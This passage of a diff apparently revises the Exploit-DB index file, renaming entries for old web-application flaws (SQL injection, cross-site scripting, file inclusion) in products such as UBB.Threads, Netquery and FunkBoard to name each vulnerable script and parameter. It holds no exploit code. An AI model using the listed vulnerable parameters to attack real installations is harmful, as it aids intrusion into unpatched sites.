5.5.1/6.x - 'modifypost.php Number' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25900,platforms/php/webapps/25900.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php message' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25901,platforms/php/webapps/25901.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php main' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25902,platforms/php/webapps/25902.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php Number' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 -25903,platforms/php/webapps/25903.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php posted' Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25891,platforms/php/webapps/25891.txt,"CarLine Forum Russian Board 4.2 - 'edit_msg.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 +25892,platforms/php/webapps/25892.txt,"CarLine Forum Russian Board 4.2 - 'memory.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 +25893,platforms/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - 'line.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 +25894,platforms/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - 'in.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 +25895,platforms/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - 'enter.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps,0 +25897,platforms/php/webapps/25897.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25898,platforms/php/webapps/25898.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections",2005-06-24,"James Bercegay",php,webapps,0 +25899,platforms/php/webapps/25899.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25900,platforms/php/webapps/25900.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25901,platforms/php/webapps/25901.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25902,platforms/php/webapps/25902.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 +25903,platforms/php/webapps/25903.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25904,platforms/php/webapps/25904.c,"K-COLLECT CSV_DB.CGI 1.0/i_DB.CGI 1.0 - Remote Command Execution",2005-06-24,blahplok,php,webapps,0 -25905,platforms/asp/webapps/25905.txt,"ASPNuke 0.80 - forgot_password.asp email Parameter Cross-Site Scripting",2005-06-27,"Alberto Trivero",asp,webapps,0 -25906,platforms/asp/webapps/25906.txt,"ASPNuke 0.80 - register.asp Multiple Parameter Cross-Site Scripting",2005-06-27,"Alberto Trivero",asp,webapps,0 +25905,platforms/asp/webapps/25905.txt,"ASPNuke 0.80 - 'forgot_password.asp?email' Cross-Site Scripting",2005-06-27,"Alberto Trivero",asp,webapps,0 +25906,platforms/asp/webapps/25906.txt,"ASPNuke 0.80 - 'register.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-06-27,"Alberto Trivero",asp,webapps,0 25907,platforms/asp/webapps/25907.txt,"ASPNuke 0.80 - Language_Select.asp HTTP Response Splitting",2005-06-27,"Alberto Trivero",asp,webapps,0 25908,platforms/asp/webapps/25908.txt,"ASPPlayGround.NET 3.2 SR1 - Arbitrary File Upload",2005-06-27,Psycho,asp,webapps,0 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 - IP Parameter HTML Injection",2005-06-27,Megabyte,php,webapps,0 @@ -28640,16 +28641,16 @@ id,file,description,date,author,platform,type,port 25920,platforms/cgi/webapps/25920.pl,"Community Link Pro - login.cgi File Parameter Remote Command Execution",2005-06-29,spher3,cgi,webapps,0 25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 - 20review.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 - 10expand.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 -25926,platforms/php/webapps/25926.txt,"osTicket 1.2/1.3 - 'view.php inc' Parameter Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 +25926,platforms/php/webapps/25926.txt,"osTicket 1.2/1.3 - 'view.php?inc' Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 25924,platforms/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal",2005-06-30,ActualMInd,asp,webapps,0 25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 - 10browse.asp SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 -25928,platforms/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - calendar.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 -25929,platforms/php/webapps/25929.txt,"EasyPHPCalendar 6.1.5/6.2.x - popup.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 -25930,platforms/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - header.inc.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 -25931,platforms/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x - datePicker.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 -25932,platforms/php/webapps/25932.txt,"EasyPHPCalendar 6.1.5/6.2.x - setupSQL.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 -25934,platforms/php/webapps/25934.txt,"Plague News System 0.7 - 'CID' Parameter SQL Injection",2005-07-04,Easyex,php,webapps,0 -25935,platforms/php/webapps/25935.txt,"Plague News System 0.7 - 'CID' Parameter Cross-Site Scripting",2005-07-04,Easyex,php,webapps,0 +25928,platforms/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'calendar.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 +25929,platforms/php/webapps/25929.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'popup.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 +25930,platforms/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'header.inc.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 +25931,platforms/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'datePicker.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 +25932,platforms/php/webapps/25932.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'setupSQL.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 +25934,platforms/php/webapps/25934.txt,"Plague News System 0.7 - 'CID' SQL Injection",2005-07-04,Easyex,php,webapps,0 +25935,platforms/php/webapps/25935.txt,"Plague News System 0.7 - 'CID' Cross-Site Scripting",2005-07-04,Easyex,php,webapps,0 25937,platforms/php/webapps/25937.txt,"Plague News System 0.7 - 'delete.php' Access Restriction Bypass",2005-07-04,Easyex,php,webapps,0 25938,platforms/php/webapps/25938.txt,"phpPgAdmin 3.x - Login Form Directory Traversal",2005-07-05,rznvynqqe@hushmail.com,php,webapps,0 25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - Read.cgi Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0 @@ -28675,7 +28676,7 @@ id,file,description,date,author,platform,type,port 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 -25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php folder' Parameter Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 +25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php?folder' Directory Traversal",2013-06-05,expl0i13r,php,webapps,0 25976,platforms/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 25978,platforms/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 @@ -28704,15 +28705,15 @@ id,file,description,date,author,platform,type,port 26017,platforms/cgi/webapps/26017.txt,"Greasemonkey 0.3.3 - Multiple Remote Information Disclosure Vulnerabilities",2005-07-20,"Mark Pilgrim",cgi,webapps,0 26018,platforms/php/webapps/26018.txt,"Pyrox Search 1.0.5 - 'Newsearch.php' Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,php,webapps,0 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0 -26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 -26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 +26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - 'header.php?version' Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 +26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - 'footer.php?version' Cross-Site Scripting",2005-07-22,rgod,php,webapps,0 26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion",2005-07-25,lwdz,php,webapps,0 -26025,platforms/php/webapps/26025.txt,"Netquery 3.1 - submit.php portnum Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 -26026,platforms/php/webapps/26026.txt,"Netquery 3.1 - nqgeoip2.php Multiple Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 -26027,platforms/php/webapps/26027.txt,"Netquery 3.1 - nqgeoip.php step Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 -26028,platforms/php/webapps/26028.txt,"Netquery 3.1 - nqports.php step Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 -26029,platforms/php/webapps/26029.txt,"Netquery 3.1 - nqports2.php Multiple Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 -26030,platforms/php/webapps/26030.txt,"Netquery 3.1 - portlist.php portnum Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 +26025,platforms/php/webapps/26025.txt,"Netquery 3.1 - 'submit.php?portnum' Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 +26026,platforms/php/webapps/26026.txt,"Netquery 3.1 - 'nqgeoip2.php' Multiple Cross-Site Scripting Vulnerabilities",2005-07-25,rgod,php,webapps,0 +26027,platforms/php/webapps/26027.txt,"Netquery 3.1 - 'nqgeoip.php?step' Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 +26028,platforms/php/webapps/26028.txt,"Netquery 3.1 - 'nqports.php?step' Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 +26029,platforms/php/webapps/26029.txt,"Netquery 3.1 - 'nqports2.php' Multiple Cross-Site Scripting Vulnerabilities",2005-07-25,rgod,php,webapps,0 +26030,platforms/php/webapps/26030.txt,"Netquery 3.1 - 'portlist.php?portnum' Cross-Site Scripting",2005-07-25,rgod,php,webapps,0 26031,platforms/php/webapps/26031.txt,"VBZoom Forum 1.11 - show.php SQL Injection",2005-07-26,abducter_minds@yahoo.com,php,webapps,0 26033,platforms/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 - viewcart.asp Cross-Site Scripting",2005-07-26,Zinho,asp,webapps,0 26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - Guestbook.php Cross-Site Scripting",2005-07-26,rgod,php,webapps,0 @@ -28728,16 +28729,16 @@ id,file,description,date,author,platform,type,port 26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0 26047,platforms/php/webapps/26047.txt,"Easypx41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 26048,platforms/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 -26049,platforms/php/webapps/26049.txt,"VBZoom 1.0/1.11 - profile.php 'Username' Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 +26049,platforms/php/webapps/26049.txt,"VBZoom 1.0/1.11 - 'profile.php?Username' Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 26050,platforms/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php' UserID Parameter Cross-Site Scripting",2005-07-29,almaster,php,webapps,0 -26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php Username' Parameter Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0 -26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple Parameter SQL Injection",2005-07-30,"James Bercegay",php,webapps,0 -26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - 'contenttypeid' Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 +26051,platforms/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php?Username' Cross-Site Scripting",2005-07-30,"James Bercegay",php,webapps,0 +26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple SQL Injections",2005-07-30,"James Bercegay",php,webapps,0 +26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - 'contenttypeid' SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 26054,platforms/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - admin.php Cross-Site Scripting",2005-09-30,FalconDeOro,php,webapps,0 26055,platforms/php/webapps/26055.txt,"Ragnarok Online Control Panel 4.3.4 a - Authentication Bypass",2005-07-30,VaLiuS,php,webapps,0 -26056,platforms/php/webapps/26056.txt,"MySQL AB Eventum 1.x - view.php id Parameter Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 -26057,platforms/php/webapps/26057.txt,"MySQL AB Eventum 1.x - list.php release Parameter Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 -26058,platforms/php/webapps/26058.txt,"MySQL AB Eventum 1.x - get_jsrs_data.php F Parameter Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 +26056,platforms/php/webapps/26056.txt,"MySQL AB Eventum 1.x - 'view.php?id' Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 +26057,platforms/php/webapps/26057.txt,"MySQL AB Eventum 1.x - 'list.php?release' Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 +26058,platforms/php/webapps/26058.txt,"MySQL AB Eventum 1.x - 'get_jsrs_data.php?F' Cross-Site Scripting",2005-08-01,"James Bercegay",php,webapps,0 26059,platforms/php/webapps/26059.txt,"PHPFreeNews 1.x - Multiple Cross-Site Scripting Vulnerabilities",2005-08-01,rgod,php,webapps,0 26060,platforms/cfm/webapps/26060.txt,"AderSoftware CFBB 1.1 - index.cfm Cross-Site Scripting",2005-08-01,rUnViRuS,cfm,webapps,0 26061,platforms/php/webapps/26061.txt,"PHPFreeNews 1.x - Admin Login SQL Injection",2005-08-01,rgod,php,webapps,0 @@ -28746,26 +28747,26 @@ id,file,description,date,author,platform,type,port 26064,platforms/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 - Shop_Display_Products.php SQL Injection",2005-08-02,"John Cobb",php,webapps,0 26065,platforms/cfm/webapps/26065.txt,"Fusebox 4.1 - index.cfm Cross-Site Scripting",2005-08-03,N.N.P,cfm,webapps,0 26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 - '.KS' File Arbitrary Python Command Execution",2005-07-31,"Radovan Garabík",cgi,webapps,0 -26067,platforms/php/webapps/26067.txt,"Web Content Management - validsession.php strRootpath Parameter Cross-Site Scripting",2005-08-03,rgod,php,webapps,0 -26068,platforms/php/webapps/26068.txt,"Web Content Management - list.php strTable Parameter Cross-Site Scripting",2005-08-03,rgod,php,webapps,0 +26067,platforms/php/webapps/26067.txt,"Web Content Management - 'validsession.php?strRootpath' Cross-Site Scripting",2005-08-03,rgod,php,webapps,0 +26068,platforms/php/webapps/26068.txt,"Web Content Management - 'list.php?strTable' Cross-Site Scripting",2005-08-03,rgod,php,webapps,0 26069,platforms/asp/webapps/26069.txt,"Naxtor E-directory 1.0 - Message.asp Cross-Site Scripting",2005-08-03,basher13,asp,webapps,0 26070,platforms/asp/webapps/26070.txt,"Naxtor E-directory 1.0 - default.asp SQL Injection",2005-08-03,basher13,asp,webapps,0 26072,platforms/php/webapps/26072.txt,"PortailPHP 2.4 - 'index.php' SQL Injection",2005-08-04,abducter_minds@yahoo.com,php,webapps,0 26073,platforms/jsp/webapps/26073.txt,"Resin Application Server 4.0.36 - Source Code Disclosure",2013-06-10,LiquidWorm,jsp,webapps,0 -26327,platforms/php/webapps/26327.txt,"Utopia News Pro 1.1.3 - 'header.php sitetitle' Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 +26327,platforms/php/webapps/26327.txt,"Utopia News Pro 1.1.3 - 'header.php?sitetitle' Cross-Site Scripting",2005-10-07,rgod,php,webapps,0 26077,platforms/php/webapps/26077.txt,"Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps,0 26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 - Logs Unauthorized Access",2005-08-23,rgod,php,webapps,0 26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting",2005-09-26,X1ngBox,php,webapps,0 26079,platforms/php/webapps/26079.txt,"Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion",2005-08-05,anonymous,php,webapps,0 26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 - WCE.download.php Directory Traversal",2005-08-05,anonymous,php,webapps,0 -26081,platforms/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - dwt_editor.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 +26081,platforms/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'dwt_editor.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps,0 26082,platforms/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_newsletter.php' language Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 -26083,platforms/php/webapps/26083.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - sign_in.php language Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 -26084,platforms/php/webapps/26084.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - archive.php language Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 -26085,platforms/php/webapps/26085.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - jax_guestbook.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 -26086,platforms/php/webapps/26086.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - jax_linklists.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 -26087,platforms/php/webapps/26087.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - jax_calendar.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 -26088,platforms/php/webapps/26088.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - shrimp_petition.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 +26083,platforms/php/webapps/26083.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'sign_in.php?language' Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 +26084,platforms/php/webapps/26084.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'archive.php?language' Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0 +26085,platforms/php/webapps/26085.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps,0 +26086,platforms/php/webapps/26086.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_linklists.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps,0 +26087,platforms/php/webapps/26087.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps,0 +26088,platforms/php/webapps/26088.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'shrimp_petition.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,php,webapps,0 26089,platforms/php/webapps/26089.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - Guestbook File Client IP Disclosure",2005-08-05,Lostmon,php,webapps,0 26090,platforms/php/webapps/26090.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - guestbook_ips2block Banned IP List Disclosure",2005-08-05,Lostmon,php,webapps,0 26091,platforms/php/webapps/26091.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - ips2block Banned IP List Disclosure",2005-08-05,Lostmon,php,webapps,0 @@ -28775,79 +28776,79 @@ id,file,description,date,author,platform,type,port 26095,platforms/php/webapps/26095.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 petitionbook Script - User IP Disclosure",2005-08-05,Lostmon,php,webapps,0 26096,platforms/php/webapps/26096.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - suggestions.csv User IP Disclosure",2005-08-05,Lostmon,php,webapps,0 26097,platforms/php/webapps/26097.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - jnl_records User Database Disclosure",2005-08-05,Lostmon,php,webapps,0 -26098,platforms/php/webapps/26098.txt,"FlatNuke 2.5.5 - structure.php Multiple Parameter Cross-Site Scripting",2005-08-05,rgod,php,webapps,0 -26099,platforms/php/webapps/26099.txt,"FlatNuke 2.5.5 - footer.php Multiple Parameter Cross-Site Scripting",2005-08-05,rgod,php,webapps,0 +26098,platforms/php/webapps/26098.txt,"FlatNuke 2.5.5 - 'structure.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,rgod,php,webapps,0 +26099,platforms/php/webapps/26099.txt,"FlatNuke 2.5.5 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,rgod,php,webapps,0 26102,platforms/php/webapps/26102.txt,"PHP-Fusion 4.0/5.0/6.0 - 'messages.php' SQL Injection",2005-08-06,almaster,php,webapps,0 26103,platforms/php/webapps/26103.txt,"SysCP 1.2.x - Multiple Script Execution Vulnerabilities",2005-08-08,"Christopher Kunz",php,webapps,0 26104,platforms/php/webapps/26104.html,"Invision Power Board 1.0.3 - Attached File Cross-Site Scripting",2005-08-08,V[i]RuS,php,webapps,0 26105,platforms/php/webapps/26105.html,"E107 Website System 0.6 - Attached File Cross-Site Scripting",2005-08-08,edward11,php,webapps,0 26106,platforms/php/webapps/26106.txt,"Gravity Board X 1.1 - Login SQL Injection",2005-08-08,rgod,php,webapps,0 -26107,platforms/asp/webapps/26107.txt,"Dvbbs 7.1/8.2 - dispbbs.asp page Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 -26108,platforms/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 - dispuser.asp name Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 -26109,platforms/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 - boardhelp.asp Multiple Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 +26107,platforms/asp/webapps/26107.txt,"Dvbbs 7.1/8.2 - 'dispbbs.asp?page' Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 +26108,platforms/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 - 'dispuser.asp?name' Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 +26109,platforms/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 - 'boardhelp.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,Lostmon,asp,webapps,0 26111,platforms/php/webapps/26111.txt,"Gravity Board X 1.1 - CSS Template Unauthorized Access",2005-08-08,rgod,php,webapps,0 26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 -26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - auth.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 -26114,platforms/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 - Subscribe.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 +26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - 'auth.php?cid' SQL Injection",2005-08-08,almaster,php,webapps,0 +26114,platforms/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 - 'Subscribe.php?cid' SQL Injection",2005-08-08,almaster,php,webapps,0 26115,platforms/php/webapps/26115.txt,"Calendar Express 2.2 - search.php Cross-Site Scripting",2005-08-08,almaster,php,webapps,0 26116,platforms/php/webapps/26116.txt,"Chipmunk CMS 1.3 - Fontcolor Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 -26117,platforms/php/webapps/26117.txt,"FunkBoard 0.66 - editpost.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 -26118,platforms/php/webapps/26118.txt,"FunkBoard 0.66 - prefs.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 -26119,platforms/php/webapps/26119.txt,"FunkBoard 0.66 - newtopic.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 -26120,platforms/php/webapps/26120.txt,"FunkBoard 0.66 - reply.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 -26121,platforms/php/webapps/26121.txt,"FunkBoard 0.66 - profile.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 -26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 - register.php Multiple Parameter Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 +26117,platforms/php/webapps/26117.txt,"FunkBoard 0.66 - 'editpost.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps,0 +26118,platforms/php/webapps/26118.txt,"FunkBoard 0.66 - 'prefs.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps,0 +26119,platforms/php/webapps/26119.txt,"FunkBoard 0.66 - 'newtopic.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps,0 +26120,platforms/php/webapps/26120.txt,"FunkBoard 0.66 - 'reply.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps,0 +26121,platforms/php/webapps/26121.txt,"FunkBoard 0.66 - 'profile.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps,0 +26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,php,webapps,0 26124,platforms/php/webapps/26124.txt,"WordPress Plugin WP-SendSms 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 -26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - 'mapname' Parameter Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 +26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - 'mapname' Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0 26127,platforms/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,php,webapps,0 26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0 -26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - 'edit_event.php eventid' Parameter 